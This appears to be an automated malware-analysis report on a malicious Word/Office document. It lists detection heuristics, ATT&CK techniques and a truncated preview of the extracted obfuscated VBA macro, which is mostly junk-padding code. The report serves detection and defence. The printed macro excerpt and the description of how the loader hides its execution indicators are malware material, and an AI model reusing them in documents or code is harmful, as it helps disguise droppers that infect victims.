MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
This Office document contains multiple high and critical severity heuristics indicating the presence of obfuscated auto-executing VBA macros. The macros are designed to load and execute code, suggesting a downloader or dropper functionality. The presence of legacy WordBasic and Excel 4.0 macros, alongside VBA, points to a multi-faceted approach to achieve execution.
Heuristics 9
-
ClamAV: Doc.Malware.00536d-6863482-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6863482-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 70621 bytes |
SHA-256: 35b6db39a8847833c0391d29fb589d105ae654438daf57466354b9d3b0a40016 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "f_31851"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "k_3513_3"
Function A_63977()
z2_84_ = 574976157 - 257719198
r72_53_ = 960679306 + m526203_
Select Case U76_73
Case 346039918
o37_219 = Chr(494929532 * Tan(c72_77))
R78___ = R1542_
Case 88380067
k46168 = W__48_5
A4_158 = j8253_
Case 367438892
n341__63 = 404918407
o_2171 = n1607__1
End Select
A2_8_6 = 169847144 - 486005855
v091__4_ = 744335508 + E25_3_03
Select Case J_9383
Case 894445451
C__2_5_9 = Chr(225161514 * Tan(C9_5_170))
Z56___1 = n52__2
Case 366263029
a367_62 = N47_33
V5529__ = U___482
Case 987123559
z181038 = 737048982
B2_45010 = N073_305
End Select
U22____9 = 718572046 - 69646328
I__543_ = 415160535 + M3_70_45
Select Case L581_03
Case 401759503
M__235 = Chr(652165806 * Tan(d24_8_))
V1_66_ = q5_59_
Case 340969289
h65_5654 = O_81310_
u_26_51 = j9_1__79
Case 171279682
a3614444 = 548447535
L____5__ = U8638_0
End Select
Q_16376 = 502460717 - 628163067
W_6490_ = 847947648 + l2872_
Select Case w331_133
Case 978826809
z7_792_ = Chr(349916663 * Tan(Y__689))
w28_005 = B626007
Case 932063374
f_539_08 = h57701
E_524___ = o267__29
Case 603910308
v12_2___ = 589097459
j9__670 = j8__5_
End Select
l_8__4 = 698887728 - 843169259
r83_6528 = 297792678 + R7073836
Select Case p_2_1364
Case 130973780
C2932_2 = Chr(446149613 * Tan(k5265_))
i876_18 = T3053785
Case 331836932
E_1_782 = b051072_
f9___5 = b_82__17
Case 826086433
w7__350 = 802856088
k69036_ = Q9489_67
End Select
S5662_ = 89938057 - 354889114
m681_5 = 105751522 + r036_5
Select Case I_206_
Case 270158298
i_3747_ = Chr(589705305 * Tan(i_316_8))
I_813__ = c6842806
Case 230739638
I7_0_42 = l__0__62
k52_1_16 = P18_940
Case 197137675
w0_719 = 506944049
T3904_4 = l_0_550
End Select
F_3678_ = 565148037 - 785979737
Y_905__1 = 965192363 + R579__
Select Case i21_567_
Case 16794265
k609241_ = Chr(656896479 * Tan(D8__7___))
V___6155 = w_1__0
Case 735510730
k_72017 = v9_35_4
q0300_81 = s__2972
Case 142385586
N____644 = 788706696
j71_03 = j90__3
End Select
End Function
Function p__2_1(D896_8_, N996000_)
On Error Resume Next
W628051_ = 52606727 - 767547973
o96058 = 623563575 + J_1_087
Select Case I__5818
Case 7789508
N32___ = Chr(191939853 * Tan(C977344))
j__846 = W71525
Case 646232976
O224385 = C050157
w70_029 = L3_4_1_1
Case 143446244
X668_5__ = 788077231
p9_0__66 = s_2_8__
End Select
V_2_67 = 522649480 - 524683014
o7__340_ = 12528873 + T_3659_
Select Case E04234
Case 448673958
C46932 = Chr(117652151 * Tan(c9009__))
z91__21_ = k8____
Case 959408227
m_14_4 = f6265277
K74951__ = p__9804
Case 997338434
I99577_ = 892598145
a47____ = z627910
End Select
M___0__ = 467162549 - 843417121
A9___1_ = 898572517 + i_1__861
Select Case X4____2_
Case 571335642
J50857_4 = Chr(441180595 * Tan(l_0_0_0))
U5___02 = v_591686
Case 429244377
Z_2328 = t2353_
d__05_58 = H_4657
Case 62020415
f49_39_1 = 860710509
I9_8_99 = Z886164_
End Select
Se
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.